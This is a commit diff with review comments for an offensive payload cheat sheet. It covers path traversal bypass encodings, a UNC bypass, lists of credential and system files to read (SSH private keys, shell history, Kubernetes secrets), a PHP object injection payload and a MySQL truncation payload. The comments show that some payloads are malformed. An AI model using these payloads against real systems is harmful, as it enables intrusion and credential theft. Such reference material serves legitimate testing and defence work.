This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Commit f656486

committed Jul 5, 2019
Fix typo in PHP Object injection
1 parent 13ba72f commit f656486

3 files changed: +36 -15 lines changed


‎Directory Traversal/README.md

Lines changed: 29 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,14 @@
66

77
* [Tools](#tools)
88
* [Basic exploitation](#basic-exploitation)
9+
* [16 bits Unicode encoding](#)
10+
* [UTF-8 Unicode encoding](#)
11+
* [Bypass "../" replaced by ""](#)
12+
* [Double URL encoding](#)
13+
* [UNC Bypass](#unc-bypass)
914
* [Path Traversal](#path-traversal)
15+
* [Interesting Linux files](#)
16+
* [Interesting Windows files](#)
1017

1118
## Tools
1219

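Review bot: The new table-of-contents entries for "16 bits Unicode encoding", "UTF-8 Unicode encoding", "Bypass "../" replaced by """, "Double URL encoding", "Interesting Linux files" and "Interesting Windows files" all link to `(#)`, so they do not navigate to their sections; only `[UNC Bypass](#unc-bypass)` has a real target. Point each entry at the anchor of the heading it names, as was done for UNC Bypass.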
@@ -31,41 +38,50 @@ We can use the `..` characters to access the parent directory, the following str
3138
%uff0e%uff0e%u2216
3239
```
3340

34-
16 bit Unicode encoding
41+
### 16 bits Unicode encoding
3542

3643
```powershell
3744
. = %u002e
3845
/ = %u2215
3946
\ = %u2216
4047
```
4148

42-
UTF-8 Unicode encoding
49+
### UTF-8 Unicode encoding
4350

4451
```powershell
4552
. = %c0%2e, %e0%40%ae, %c0ae
4653
/ = %c0%af, %e0%80%af, %c0%2f
4754
\ = %c0%5c, %c0%80%5c
4855
```
4956

57+
### Bypass "../" replaced by ""
5058
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
5159

5260
```powershell
5361
..././
5462
...\.\
5563
```
5664

57-
Double URL encoding
65+
### Double URL encoding
5866

5967
```powershell
6068
. = %252e
6169
/ = %252f
6270
\ = %255c
6371
```
6472

73+
### UNC Bypass
74+
75+
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
76+
77+
```powershell
78+
\\localhost\c$\windows\win.ini
79+
```
80+
6581

6682
## Path Traversal
6783

68-
Linux - Interesting files to check out :
84+
### Interesting Linux files
6985

7086
```powershell
7187
/etc/issue
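Review bot: In the new UNC Bypass paragraph the share name is written as plain text, `('\\UNC\share\name')`, and Markdown reads `\\` as an escaped backslash, so the rendered sentence shows a single leading backslash and no longer looks like a UNC path. Wrap it in backticks, as the fenced example under it already protects `\\localhost\c$\windows\win.ini`. The paragraph should also say that this case is Windows-specific, so a reader scanning Basic exploitation knows when it applies. Two smaller points: the section adds two consecutive blank lines after the heading and another before `## Path Traversal`, and the promoted heading would read better as "16-bit Unicode encoding", with the table of contents updated to match.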
@@ -85,9 +101,16 @@ Linux - Interesting files to check out :
85101
/proc/net/route
86102
/proc/net/tcp
87103
/proc/net/udp
104+
/proc/self/cwd/index.php
105+
/proc/self/cwd/main.py
106+
/home/$USER/.bash_history
107+
/home/$USER/.ssh/id_rsa
108+
/var/run/secrets/kubernetes.io/serviceaccount
88109
```
89110

90-
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
111+
### Interesting Windows files
112+
113+
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
91114

92115
```powershell
93116
c:/boot.ini
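Review bot: Under `### Interesting Windows files` the added line "Interesting files to check out (Extracted from ...)" repeats the heading directly above it; reduce it to the attribution, for example "Extracted from https://github.com/soffensive/windowsblindread". In the Linux list, `$USER` in `/home/$USER/.bash_history` and `/home/$USER/.ssh/id_rsa` is a placeholder that is never explained, and `/var/run/secrets/kubernetes.io/serviceaccount` is a directory in a list titled "files"; one sentence after the fence would cover both.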
@@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
127150
/var/log/mail
128151
```
129152

130-
Other easy win files.
131-
132-
```powershell
133-
/proc/self/cwd/index.php
134-
/home/$USER/.bash_history
135-
/var/run/secrets/kubernetes.io/serviceaccount
136-
```
137-
138-
139153
## References
140154

141155
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
156+
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
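Review bot: The link text of the new CWE-40 reference contains raw backslashes (`'\\UNC\share\name\'`); Markdown reads `\\` and `\'` as escapes, so the rendered title loses a backslash at each of those places. Put the path in backticks inside the link text, or double the backslashes. The entry also carries a date ("December 27, 2018") while the Wikipedia entry above it has none, so settle on one reference style. Removing "Other easy win files" loses nothing, since its three paths now appear in the Linux list.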

‎Insecure Deserialization/PHP.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -99,7 +99,7 @@ if($obj) {
9999
Payload:
100100

101101
```php
102-
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
102+
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
103103
```
104104

105105
## Others exploits
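Review bot: The replacement payload line renames the property from `code` to `guess` but keeps the length prefix at `s:4`, and `guess` is five bytes long, so `s:4:"guess"` is not a valid serialized string and `unserialize()` will reject the payload. Change it to `s:5:"guess"`.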

‎SQL Injection/MySQL Injection.md

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
263263

264264
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
265265

266+
```sql
267+
`username` varchar(20) not null
268+
```
269+
270+
Payload: `username = "admin a"`
271+
266272
## MYSQL UDF command execution
267273

268274
First you need to check if the UDF are installed on the server.
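Review bot: The added payload `username = "admin a"` is seven characters as written, which fits inside the `varchar(20)` column shown just above it, so nothing is truncated and the example does not demonstrate what the preceding paragraph describes (a 21-character input against a 20-character limit). If the value is meant to be padded with spaces past the column limit, put it in a fenced block rather than inline code so the padding is unambiguous, and state the total length. The `varchar(20) not null` fragment would also be clearer with a one-line note that it is the relevant column from the table definition.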
